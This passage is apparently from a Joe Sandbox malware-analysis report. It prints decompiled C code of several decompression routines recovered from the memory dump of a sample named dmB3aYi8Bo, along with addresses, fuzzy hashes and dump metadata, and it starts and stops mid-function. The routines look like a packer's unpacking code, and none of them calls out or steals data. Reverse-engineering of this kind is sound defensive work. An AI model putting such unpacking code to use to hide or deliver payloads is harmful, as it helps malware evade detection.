									_v16 = _t95;
									if(_t127 == 0) {
										goto L45;
									} else {
										_v8 = _v8 + 3;
										goto L55;
									}
									goto L61;
								} else {
									if(_t95 == 0) {
										_t87 =  *(_t176 + _t88);
										_t176 = _t176 + 4;
										_v16 = 0x1f;
										_t138 = _t87 >> 0x1f;
									} else {
										_t105 = _t95 - 1;
										_v16 = _t105;
										_t138 = _t87 >> _t105 & 0x00000001;
									}
									_t139 = _t138 + 3;
									L43:
									_v8 = _t139;
									L55:
									_t170 = _v20;
									asm("sbb ecx, ecx");
									_v8 = _v8 +  ~0x500;
									if(_v8 + _t170 > _v28 || _v12 > _t170) {
										goto L61;
									} else {
										_t103 = _t170 - _v12 + _a4;
										_v12 = _t103;
										_t104 = _a4;
										 *((char*)(_t170 + _t104)) =  *_t103;
										_t171 = _t170 + 1;
										_v12 = _v12 + 1;
										do {
											 *((char*)(_t171 + _t104)) =  *_v12;
											_t171 = _t171 + 1;
											_v12 = _v12 + 1;
											_t73 =  &_v8;
											 *_t73 = _v8 - 1;
										} while ( *_t73 != 0);
										goto L8;
									}
								}
							}
							if(_t93 == 0) {
								_t87 =  *(_t176 + _t88);
								_t176 = _t176 + 4;
								_v16 = 0x1f;
								_t145 = _t87 >> 0x1f;
							} else {
								_t106 = _t93 - 1;
								_v16 = _t106;
								_t145 = _t87 >> _t106 & 0x00000001;
							}
							_t139 = _t145 + 1;
							goto L43;
						}
						_v12 = _v32;
						if(_t93 == 0) {
							_t87 =  *(_t176 + _t88);
							_t176 = _t176 + 4;
							_t93 = 0x1f;
							_t168 = _t87 >> 0x1f;
						} else {
							_t93 = _t93 - 1;
							_t168 = _t87 >> _t93 & 0x00000001;
						}
						goto L30;
					} else {
						if(_t93 == 0) {
							_t87 =  *(_t176 + _t88);
							_t176 = _t176 + 4;
							_t91 = 0x1f;
							_t150 = _t87 >> 0x1f;
						} else {
							_t162 = _v12;
							_t91 = _t93 - 1;
							_t150 = _t87 >> _t91 & 0x00000001;
						}
						_v12 = _t150 + _t162 * 2 - 2;
						goto L10;
					}
					goto L61;
				}
			}

0x012b6376
0x012b637f
0x012b6384
0x012b6386
0x012b6388
0x012b638a
0x012b6391
0x012b6394
0x012b6394
0x012b6399
0x012b63aa
0x012b63ac
0x012b63af
0x012b63b0
0x012b639b
0x012b639b
0x012b63a0
0x012b63a0
0x012b63b3
0x012b63b8
0x00000000
0x00000000
0x012b63bd
0x012b65f8
0x012b65f8
0x012b65fa
0x012b65fe
0x012b63cc
0x012b63d2
0x012b63d5
0x012b63d6
0x012b63d7
0x012b63d7
0x00000000
0x012b63d7
0x012b63dc
0x012b63dc
0x00000000
0x012b63e3
0x012b63e5
0x012b63f6
0x012b63f8
0x012b63fb
0x012b63fc
0x012b63e7
0x012b63e7
0x012b63ec
0x012b63ec
0x012b6402
0x012b6405
0x012b640b
0x00000000
0x00000000
0x012b641f
0x012b6430
0x012b6432
0x012b6435
0x012b6436
0x012b6421
0x012b6421
0x012b6426
0x012b6426
0x012b643b
0x012b646b
0x012b6494
0x00000000
0x00000000
0x012b64a4
0x012b64a6
0x012b64aa
0x012b65e8
0x012b65f1
0x012b65f3
0x00000000
0x012b65f3
0x012b64b6
0x012b64b9
0x012b64ba
0x012b64bd
0x012b64c0
0x012b64c2
0x012b64ec
0x012b64fd
0x012b64ff
0x012b6502
0x012b6503
0x012b64ee
0x012b64ee
0x012b64f3
0x012b64f3
0x012b6508
0x012b6535
0x00000000
0x012b653c
0x012b653e
0x012b654a
0x012b6551
0x012b6554
0x012b6555
0x012b6540
0x012b6540
0x012b6545
0x012b6545
0x012b655b
0x012b655e
0x012b6564
0x00000000
0x00000000
0x012b6575
0x012b6581
0x012b6588
0x012b658b
0x012b658c
0x012b6577
0x012b6577
0x012b657c
0x012b657c
0x012b658f
0x012b6594
0x00000000
0x012b6596
0x012b6596
0x00000000
0x012b6596
0x00000000
0x012b650a
0x012b650c
0x012b651b
0x012b6520
0x012b6523
0x012b652a
0x012b650e
0x012b650e
0x012b6513
0x012b6516
0x012b6516
0x012b652d
0x012b6530
0x012b6530
0x012b659a
0x012b659a
0x012b65a5
0x012b65a9
0x012b65b4
0x00000000
0x012b65bb
0x012b65c0
0x012b65c5
0x012b65c8
0x012b65cb
0x012b65ce
0x012b65cf
0x012b65d2
0x012b65d7
0x012b65da
0x012b65db
0x012b65de
0x012b65de
0x012b65de
0x00000000
0x012b65e3
0x012b65b4
0x012b6508
0x012b64c6
0x012b64d5
0x012b64da
0x012b64dd
0x012b64e4
0x012b64c8
0x012b64c8
0x012b64cd
0x012b64d0
0x012b64d0
0x012b64e7
0x00000000
0x012b64e7
0x012b6470
0x012b6475
0x012b6481
0x012b6488
0x012b648b
0x012b648c
0x012b6477
0x012b6477
0x012b647c
0x012b647c
0x00000000
0x012b643d
0x012b643f
0x012b644e
0x012b6455
0x012b6458
0x012b6459
0x012b6441
0x012b6441
0x012b6444
0x012b6449
0x012b6449
0x012b6460
0x00000000
0x012b6460
0x00000000
0x012b643b

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fc0df7198c2952aa6d83230121b629796a3092540dfd5d9c69a865571978738
Instruction ID: b6e7133056f0291e753cb8cb442818c0f80415ea53ba788264c2857e29417187
Opcode Fuzzy Hash: 5fc0df7198c2952aa6d83230121b629796a3092540dfd5d9c69a865571978738
Instruction Fuzzy Hash: 1F810531E255079BDB18CE59C4812FEB7B3EBC0360F24C17DDA466B789C674A941CB80

Uniqueness

Uniqueness Score: -1.00%

Function 012B6601 Relevance: .2, Instructions: 231
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E012B6601(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _t61;
				unsigned int _t64;
				intOrPtr _t65;
				signed int _t67;
				unsigned int _t68;
				signed int _t69;
				unsigned int _t71;
				signed int _t73;
				signed int _t75;
				void* _t76;
				intOrPtr _t78;
				void* _t79;
				signed char _t84;
				signed char _t85;
				signed char _t86;
				signed char _t88;
				signed char _t89;
				unsigned int _t91;
				signed int _t92;
				unsigned int _t93;
				signed int _t94;
				signed int _t95;
				signed int _t100;
				unsigned int _t101;
				signed int _t102;
				signed int _t104;
				signed int _t106;
				signed int _t119;
				signed int _t125;
				signed int _t133;
				intOrPtr _t139;
				intOrPtr* _t142;
				void* _t146;

				_t139 = __ecx;
				_t84 = 0;
				_t146 = 0;
				_v28 = __edx;
				_v24 = __ecx;
				_t65 = 0;
				_v16 = 1;
				L1:
				while(1) {
					if(_t84 == 0) {
						_t91 =  *(_t146 + _t139);
						_t146 = _t146 + 4;
						_t84 = 0x1f;
						_t92 = _t91 >> 0x1f;
					} else {
						_t84 = _t84 - 1;
						_t92 = _t64 >> _t84 & 0x00000001;
					}
					if(_t92 == 0) {
						_v12 = _t65;
						_t67 = 1;
						L8:
						L8:
						if(_t84 == 0) {
							_t93 =  *(_t146 + _t139);
							_t146 = _t146 + 4;
							_t85 = 0x1f;
							_t94 = _t93 >> 0x1f;
						} else {
							_t85 = _t84 - 1;
							_t94 = _t64 >> _t85 & 0x00000001;
						}
						_t95 = _t94 + _t67 * 2;
						_v8 = _t95;
						if(_t85 == 0) {
							_t68 =  *(_t146 + _t139);
							_t146 = _t146 + 4;
							_t86 = 0x1f;
							_t69 = _t68 >> 0x1f;
						} else {
							_t86 = _t85 - 1;
							_t69 = _t64 >> _t86 & 0x00000001;
						}
						if(_t69 != 0) {
							goto L19;
						}
						if(_t86 == 0) {
							_t64 =  *(_t146 + _t139);
							_t146 = _t146 + 4;
							_t84 = 0x1f;
							_t133 = _t64 >> 0x1f;
						} else {
							_t84 = _t86 - 1;
							_t133 = _t64 >> _t84 & 0x00000001;
						}
						_t18 = _v8 * 2; // -2
						_t67 = _t133 + _t18 - 2;
						goto L8;
						L19:
						if(_t95 != 2) {
							_t71 = ( *(_t146 + _t139) & 0x000000ff) + (_t95 + 0xfffffffd << 8);
							_t146 = _t146 + 1;
							if(_t71 == 0xffffffff) {
								_t61 = _a8;
								 *_t61 = _v12;
								return _t61 & 0xffffff00 | _t146 == _v28;
							}
							_t100 =  !_t71 & 0x00000001;
							_t73 = (_t71 >> 1) + 1;
							_v8 = _t73;
							_v16 = _t73;
							L25:
							if(_t100 == 0) {
								if(_t86 == 0) {
									_t101 =  *(_t146 + _t139);
									_t146 = _t146 + 4;
									_t88 = 0x1f;
									_t102 = _t101 >> 0x1f;
								} else {
									_t88 = _t86 - 1;
									_t102 = _t64 >> _t88 & 0x00000001;
								}
								if(_t102 == 0) {
									_t75 = 1;
									do {
										if(_t88 == 0) {
											_t64 =  *(_t146 + _t139);
											_t146 = _t146 + 4;
											_t89 = 0x1f;
											_t104 = _t64 >> 0x1f;
										} else {
											_t89 = _t88 - 1;
											_t104 = _t64 >> _t89 & 0x00000001;
										}
										_t75 = _t104 + _t75 * 2;
										if(_t89 == 0) {
											_t64 =  *(_t146 + _t139);
											_t146 = _t146 + 4;
											_t88 = 0x1f;
											_t106 = _t64 >> 0x1f;
										} else {
											_t88 = _t89 - 1;
											_t106 = _t64 >> _t88 & 0x00000001;
										}
									} while (_t106 == 0);
									_t76 = _t75 + 3;
									goto L47;
								} else {
									if(_t88 == 0) {
										_t64 =  *(_t146 + _t139);
										_t146 = _t146 + 4;
										_t84 = 0x1f;
										_t119 = _t64 >> 0x1f;
									} else {
										_t84 = _t88 - 1;
										_t119 = _t64 >> _t84 & 0x00000001;
									}
									_t30 = _t119 + 3; // 0x3
									_t76 = _t30;
									L47:
									asm("sbb edx, edx");
									_v20 = _t76 +  ~0x500;
									_t78 = _v12;
									_t142 = _t78 - _v8 + _a4;
									_v8 = _t142;
									 *((char*)(_t78 + _a4)) =  *_t142;
									_t79 = _t78 + 1;
									_v8 = _v8 + 1;
									do {
										 *((char*)(_t79 + _a4)) =  *_v8;
										_t79 = _t79 + 1;
										_v8 = _v8 + 1;
										_t50 =  &_v20;
										 *_t50 = _v20 - 1;
									} while ( *_t50 != 0);
									goto L6;
								}
							}
							if(_t86 == 0) {
								_t64 =  *(_t146 + _t139);
								_t146 = _t146 + 4;
								_t84 = 0x1f;
								_t125 = _t64 >> 0x1f;
							} else {
								_t84 = _t86 - 1;
								_t125 = _t64 >> _t84 & 0x00000001;
							}
							_t27 = _t125 + 1; // 0x1
							_t76 = _t27;
							goto L47;
						}
						_v8 = _v16;
						if(_t86 == 0) {
							_t64 =  *(_t146 + _t139);
							_t146 = _t146 + 4;
							_t86 = 0x1f;
							_t100 = _t64 >> 0x1f;
						} else {
							_t86 = _t86 - 1;
							_t100 = _t64 >> _t86 & 0x00000001;
						}
						goto L25;
					} else {
						 *((char*)(_t79 + _a4)) =  *(_t146 + _t139);
						_t65 = _t79 + 1;
						_t146 = _t146 + 1;
						L6:
						_t139 = _v24;
						continue;
					}
				}
			}

0x012b660a
0x012b660e
0x012b6610
0x012b6612
0x012b6615
0x012b6618
0x012b661a
0x00000000
0x012b6621
0x012b6623
0x012b6634
0x012b6636
0x012b6639
0x012b663a
0x012b6625
0x012b6625
0x012b662a
0x012b662a
0x012b663f
0x012b6651
0x012b6656
0x00000000
0x012b6657
0x012b6659
0x012b666a
0x012b666c
0x012b666f
0x012b6670
0x012b665b
0x012b665b
0x012b6660
0x012b6660
0x012b6673
0x012b6676
0x012b667b
0x012b668c
0x012b668e
0x012b6691
0x012b6692
0x012b667d
0x012b667d
0x012b6682
0x012b6682
0x012b6697
0x00000000
0x00000000
0x012b669b
0x012b66a7
0x012b66ae
0x012b66b1
0x012b66b2
0x012b669d
0x012b669d
0x012b66a2
0x012b66a2
0x012b66b8
0x012b66b8
0x00000000
0x012b66be
0x012b66c1
0x012b66f1
0x012b66f3
0x012b66f7
0x012b67ff
0x012b680a
0x012b6811
0x012b6811
0x012b6703
0x012b6706
0x012b6707
0x012b670a
0x012b670d
0x012b670f
0x012b6737
0x012b6748
0x012b674a
0x012b674d
0x012b674e
0x012b6739
0x012b6739
0x012b673e
0x012b673e
0x012b6753
0x012b6778
0x012b6779
0x012b677b
0x012b6787
0x012b678e
0x012b6791
0x012b6792
0x012b677d
0x012b677d
0x012b6782
0x012b6782
0x012b6795
0x012b679a
0x012b67a6
0x012b67ad
0x012b67b0
0x012b67b1
0x012b679c
0x012b679c
0x012b67a1
0x012b67a1
0x012b67b4
0x012b67b8
0x00000000
0x012b6755
0x012b6757
0x012b6763
0x012b676a
0x012b676d
0x012b676e
0x012b6759
0x012b6759
0x012b675e
0x012b675e
0x012b6771
0x012b6771
0x012b67bb
0x012b67c3
0x012b67c9
0x012b67cc
0x012b67d4
0x012b67d9
0x012b67df
0x012b67e2
0x012b67e3
0x012b67e6
0x012b67ee
0x012b67f1
0x012b67f2
0x012b67f5
0x012b67f5
0x012b67f5
0x00000000
0x012b67fa
0x012b6753
0x012b6713
0x012b671f
0x012b6726
0x012b6729
0x012b672a
0x012b6715
0x012b6715
0x012b671a
0x012b671a
0x012b672d
0x012b672d
0x00000000
0x012b672d
0x012b66c6
0x012b66cb
0x012b66d7
0x012b66de
0x012b66e1
0x012b66e2
0x012b66cd
0x012b66cd
0x012b66d2
0x012b66d2
0x00000000
0x012b6641
0x012b6647
0x012b664a
0x012b664b
0x012b664c
0x012b664c
0x00000000
0x012b664c
0x012b663f

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56784c30bbe3f211566824a4ae5638e61b2e12fa3fa20e357c1d06f3d228e869
Instruction ID: 9e738b37f1101fda4dfdef0792ca20113aab9db2af3fbe58c673f7a6ccce9392
Opcode Fuzzy Hash: 56784c30bbe3f211566824a4ae5638e61b2e12fa3fa20e357c1d06f3d228e869
Instruction Fuzzy Hash: 56610735B2560787EB0CCE59C8C11FA77A3EBC4361B28C13DDE065B789E675D9819A80

Uniqueness

Uniqueness Score: -1.00%

Function 012B5F21 Relevance: .2, Instructions: 226
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E012B5F21(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				char _v32;
				signed int _t83;
				signed int _t88;
				unsigned int _t90;
				signed int _t92;
				signed int _t94;
				void* _t95;
				char _t96;
				signed int _t101;
				signed int _t105;
				signed int _t111;
				signed char _t112;
				signed char _t113;
				signed char _t114;
				intOrPtr _t118;
				intOrPtr _t119;
				signed char _t122;
				void* _t125;
				unsigned int _t129;
				signed int _t130;
				unsigned int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t138;
				intOrPtr* _t141;
				unsigned int _t147;
				signed int _t148;
				signed int _t150;
				intOrPtr _t162;
				unsigned int _t167;

				_t83 = 0;
				_v20 = __edx;
				_t125 = __ecx;
				_t111 = 0;
				_v16 = 0;
				_v28 = 1;
				_v24 =  *_a8;
				L1:
				while(1) {
					if(_t111 == 0) {
						_t129 =  *(_t83 + _t125);
						_t83 = _t83 + 4;
						_t112 = 0x1f;
						_t130 = _t129 >> 0x1f;
					} else {
						_t112 = _t111 - 1;
						_t130 = _t167 >> _t112 & 0x00000001;
					}
					_v8 = _t112;
					if(_t130 == 0) {
						_v12 = 1;
						L10:
						L10:
						if(_t112 == 0) {
							_t131 =  *(_t83 + _t125);
							_t83 = _t83 + 4;
							_t113 = 0x1f;
							_t132 = _t131 >> 0x1f;
						} else {
							_t113 = _t112 - 1;
							_t132 = _t167 >> _t113 & 0x00000001;
						}
						_t133 = _t132 + _v12 * 2;
						_v12 = _t133;
						if(_t83 >= _v20 || _t133 > 0x1000002) {
							goto L51;
						}
						if(_t113 == 0) {
							_t167 =  *(_t83 + _t125);
							_t83 = _t83 + 4;
							_t114 = 0x1f;
							_t88 = _t167 >> 0x1f;
						} else {
							_t114 = _t113 - 1;
							_t88 = _t167 >> _t114 & 0x00000001;
						}
						if(_t88 != 0) {
							if(_t133 != 2) {
								if(_t83 >= _v20) {
									goto L51;
								}
								_t90 = ( *(_t83 + _t125) & 0x000000ff) + (_t133 + 0xfffffffd << 8);
								_t83 = _t83 + 1;
								if(_t90 == 0xffffffff) {
									 *_a8 = _v16;
									return _t83 & 0xffffff00 | _t83 == _v20;
								}
								_t138 =  !_t90 & 0x00000001;
								_t92 = (_t90 >> 1) + 1;
								_v12 = _t92;
								_v28 = _t92;
								L30:
								if(_t114 == 0) {
									_t167 =  *(_t83 + _t125);
									_t83 = _t83 + 4;
									_v8 = 0x1f;
									_t94 = _t167 >> 0x1f;
								} else {
									_t122 = _t114 - 1;
									_v8 = _t122;
									_t94 = _t167 >> _t122 & 0x00000001;
								}
								_t95 = _t94 + _t138 * 2;
								if(_t95 != 0) {
									L45:
									asm("sbb ecx, ecx");
									_t96 = _t95 +  ~0x500;
									_t118 = _v16;
									_v32 = _t96;
									if(_t96 + _t118 > _v24 || _v12 > _t118) {
										goto L51;
									} else {
										_t141 = _t118 - _v12 + _a4;
										_v12 = _t141;
										 *((char*)(_t118 + _a4)) =  *_t141;
										_t119 = _t118 + 1;
										_v12 = _v12 + 1;
										do {
											 *((char*)(_t119 + _a4)) =  *_v12;
											_t119 = _t119 + 1;
											_v12 = _v12 + 1;
											_t75 =  &_v32;
											 *_t75 = _v32 - 1;
										} while ( *_t75 != 0);
										_v16 = _t119;
										goto L8;
									}
								} else {
									_t101 = _t95 + 1;
									L35:
									L35:
									if(_v8 <= 0) {
										_t147 =  *(_t83 + _t125);
										_t83 = _t83 + 4;
										_v8 = 0x1f;
										_t148 = _t147 >> 0x1f;
									} else {
										_v8 = _v8 - 1;
										_t148 = _t167 >> _v8 & 0x00000001;
									}
									_t101 = _t148 + _t101 * 2;
									if(_t83 >= _v20 || _t101 >= _v24) {
										goto L51;
									}
									if(_v8 <= 0) {
										_t167 =  *(_t83 + _t125);
										_t83 = _t83 + 4;
										_v8 = 0x1f;
										_t150 = _t167 >> 0x1f;
									} else {
										_v8 = _v8 - 1;
										_t150 = _t167 >> _v8 & 0x00000001;
									}
									if(_t150 == 0) {
										goto L35;
									} else {
										_t95 = _t101 + 2;
										goto L45;
									}
									goto L51;
								}
							}
							_v12 = _v28;
							if(_t114 == 0) {
								_t167 =  *(_t83 + _t125);
								_t83 = _t83 + 4;
								_t114 = 0x1f;
								_t138 = _t167 >> 0x1f;
							} else {
								_t114 = _t114 - 1;
								_t138 = _t167 >> _t114 & 0x00000001;
							}
							goto L30;
						} else {
							if(_t114 == 0) {
								_t167 =  *(_t83 + _t125);
								_t83 = _t83 + 4;
								_t112 = 0x1f;
								_t105 = _t167 >> 0x1f;
							} else {
								_t133 = _v12;
								_t112 = _t114 - 1;
								_t105 = _t167 >> _t112 & 0x00000001;
							}
							_t27 = _t133 * 2; // -2
							_v12 = _t105 + _t27 - 2;
							goto L10;
						}
						goto L51;
					} else {
						if(_t83 >= _v20) {
							L51:
							return 0;
						}
						_t162 = _v16;
						if(_t162 >= _v24) {
							goto L51;
						}
						 *((char*)(_t162 + _a4)) =  *(_t83 + _t125);
						_v16 = _t162 + 1;
						_t83 = _t83 + 1;
						L8:
						_t111 = _v8;
						continue;
					}
				}
			}

0x012b5f2f
0x012b5f31
0x012b5f34
0x012b5f38
0x012b5f3a
0x012b5f3d
0x012b5f44
0x00000000
0x012b5f47
0x012b5f49
0x012b5f5a
0x012b5f5c
0x012b5f5f
0x012b5f60
0x012b5f4b
0x012b5f4b
0x012b5f50
0x012b5f50
0x012b5f63
0x012b5f68
0x012b5f92
0x00000000
0x012b5f99
0x012b5f9b
0x012b5fac
0x012b5fae
0x012b5fb1
0x012b5fb2
0x012b5f9d
0x012b5f9d
0x012b5fa2
0x012b5fa2
0x012b5fb8
0x012b5fbb
0x012b5fc1
0x00000000
0x00000000
0x012b5fd5
0x012b5fe1
0x012b5fe8
0x012b5feb
0x012b5fec
0x012b5fd7
0x012b5fd7
0x012b5fdc
0x012b5fdc
0x012b5ff1
0x012b6021
0x012b604a
0x00000000
0x00000000
0x012b605a
0x012b605c
0x012b6060
0x012b6167
0x00000000
0x012b6169
0x012b606c
0x012b606f
0x012b6070
0x012b6073
0x012b6076
0x012b6078
0x012b6087
0x012b608c
0x012b608f
0x012b6096
0x012b607a
0x012b607a
0x012b607f
0x012b6082
0x012b6082
0x012b6099
0x012b609e
0x012b610b
0x012b6113
0x012b6117
0x012b6119
0x012b611c
0x012b6124
0x00000000
0x012b612b
0x012b6130
0x012b6135
0x012b613b
0x012b613e
0x012b613f
0x012b6142
0x012b614a
0x012b614d
0x012b614e
0x012b6151
0x012b6151
0x012b6151
0x012b6156
0x00000000
0x012b6156
0x012b60a0
0x012b60a0
0x00000000
0x012b60a1
0x012b60a5
0x012b60b9
0x012b60bb
0x012b60be
0x012b60c5
0x012b60a7
0x012b60a7
0x012b60b1
0x012b60b1
0x012b60c8
0x012b60ce
0x00000000
0x00000000
0x012b60e1
0x012b60f2
0x012b60f7
0x012b60fa
0x012b6101
0x012b60e3
0x012b60e3
0x012b60ed
0x012b60ed
0x012b6106
0x00000000
0x012b6108
0x012b6108
0x00000000
0x012b6108
0x00000000
0x012b6106
0x012b609e
0x012b6026
0x012b602b
0x012b6037
0x012b603e
0x012b6041
0x012b6042
0x012b602d
0x012b602d
0x012b6032
0x012b6032
0x00000000
0x012b5ff3
0x012b5ff5
0x012b6004
0x012b600b
0x012b600e
0x012b600f
0x012b5ff7
0x012b5ff7
0x012b5ffa
0x012b5fff
0x012b5fff
0x012b6012
0x012b6016
0x00000000
0x012b6016
0x00000000
0x012b5f6a
0x012b5f6d
0x012b616e
0x00000000
0x012b616e
0x012b5f73
0x012b5f79
0x00000000
0x00000000
0x012b5f85
0x012b5f89
0x012b5f8c
0x012b5f8d
0x012b5f8d
0x00000000
0x012b5f8d
0x012b5f68

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f69abb42470e202d70792407f606e9f5084fa8231433eff183cf4fb132ad99ba
Instruction ID: 29675e0aa3e2e85ef0f03cd5f7ebca18f7893061ad37a3744e4dfd49bf8324f5
Opcode Fuzzy Hash: f69abb42470e202d70792407f606e9f5084fa8231433eff183cf4fb132ad99ba
Instruction Fuzzy Hash: B071D77692521ADBDF14CF89C4C16EDB772FF85364F2A41A9CA517B382C770A941CB80

Uniqueness

Uniqueness Score: -1.00%

Function 012B5B49 Relevance: .2, Instructions: 209
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E012B5B49(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _t71;
				void* _t74;
				signed char _t76;
				signed char _t77;
				signed char _t78;
				signed char _t80;
				signed char _t81;
				signed char _t87;
				intOrPtr _t90;
				signed int _t92;
				void* _t94;
				signed int _t96;
				signed int _t98;
				intOrPtr _t99;
				void* _t100;
				signed int _t102;
				unsigned int _t107;
				signed int _t108;
				signed int _t110;
				signed int _t112;
				signed int _t115;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				intOrPtr* _t125;
				unsigned int _t130;
				signed int _t131;
				signed int _t133;
				unsigned int _t145;

				_t74 = __ecx;
				_v24 = __edx;
				_t76 = 0;
				_t71 = 0;
				_t90 = 0;
				_v32 = 1;
				_v28 =  *_a8;
				while(1) {
					_v20 = _t90;
					if(_t76 == 0) {
						_t107 =  *(_t71 + _t74);
						_t71 = _t71 + 4;
						_t77 = 0x1f;
						_t108 = _t107 >> 0x1f;
					} else {
						_t77 = _t76 - 1;
						_t108 = _t145 >> _t77 & 0x00000001;
					}
					_v16 = _t77;
					if(_t108 == 0) {
						goto L9;
					}
					if(_t71 >= _v24 || _t90 >= _v28) {
						L48:
						return 0;
					} else {
						 *((char*)(_t90 + _a4)) =  *(_t71 + _t74);
						_t90 = _t90 + 1;
						_t71 = _t71 + 1;
						L8:
						_t76 = _v16;
						continue;
					}
					L9:
					_v12 = 1;
					L10:
					L10:
					if(_t77 == 0) {
						_t145 =  *(_t71 + _t74);
						_t71 = _t71 + 4;
						_t78 = 0x1f;
						_t110 = _t145 >> 0x1f;
					} else {
						_t78 = _t77 - 1;
						_t110 = _t145 >> _t78 & 0x00000001;
					}
					_t92 = _t110 + _v12 * 2;
					_v12 = _t92;
					if(_t71 >= _v24 || _t92 > 0x1000002) {
						goto L48;
					}
					if(_t78 == 0) {
						_t145 =  *(_t71 + _t74);
						_t71 = _t71 + 4;
						_t77 = 0x1f;
						_t112 = _t145 >> 0x1f;
					} else {
						_t77 = _t78 - 1;
						_t112 = _t145 >> _t77 & 0x00000001;
					}
					if(_t112 == 0) {
						goto L10;
					} else {
						_t115 = _v12;
						if(_t115 != 2) {
							if(_t71 >= _v24) {
								goto L48;
							}
							_t94 = ( *(_t71 + _t74) & 0x000000ff) + (_t115 + 0xfffffffd << 8);
							_t71 = _t71 + 1;
							if(_t94 == 0xffffffff) {
								 *_a8 = _v20;
								return _t71 & 0xffffff00 | _t71 == _v24;
							}
							_t96 = _t94 + 1;
							_v32 = _t96;
							L24:
							_v12 = _t96;
							if(_t77 == 0) {
								_t145 =  *(_t71 + _t74);
								_t71 = _t71 + 4;
								_t80 = 0x1f;
								_t98 = _t145 >> 0x1f;
							} else {
								_t80 = _t77 - 1;
								_t98 = _t145 >> _t80 & 0x00000001;
							}
							_v8 = _t98;
							if(_t80 == 0) {
								_t145 =  *(_t71 + _t74);
								_t71 = _t71 + 4;
								_t81 = 0x1f;
								_t119 = _t145 >> 0x1f;
							} else {
								_t81 = _t80 - 1;
								_t119 = _t145 >> _t81 & 0x00000001;
							}
							_t120 = _t119 + _t98 * 2;
							_v16 = _t81;
							if(_t120 != 0) {
								L42:
								_t99 = _v20;
								asm("sbb ecx, ecx");
								_t121 = _t120 +  ~0xd00;
								_v8 = _t121;
								if(_t121 + _t99 > _v28 || _v12 > _t99) {
									goto L48;
								} else {
									_t125 = _t99 - _v12 + _a4;
									_v12 = _t125;
									 *((char*)(_t99 + _a4)) =  *_t125;
									_t100 = _t99 + 1;
									_v12 = _v12 + 1;
									do {
										 *((char*)(_t100 + _a4)) =  *_v12;
										_t100 = _t100 + 1;
										_v12 = _v12 + 1;
										_t64 =  &_v8;
										 *_t64 = _v8 - 1;
									} while ( *_t64 != 0);
									goto L8;
								}
							} else {
								_v8 = 1;
								L32:
								L32:
								if(_t81 == 0) {
									_t130 =  *(_t71 + _t74);
									_t71 = _t71 + 4;
									_t87 = 0x1f;
									_t131 = _t130 >> 0x1f;
								} else {
									_t87 = _t81 - 1;
									_t131 = _t145 >> _t87 & 0x00000001;
								}
								_t102 = _t131 + _v8 * 2;
								_v8 = _t102;
								if(_t71 >= _v24 || _t102 >= _v28) {
									goto L48;
								}
								if(_t87 == 0) {
									_t145 =  *(_t71 + _t74);
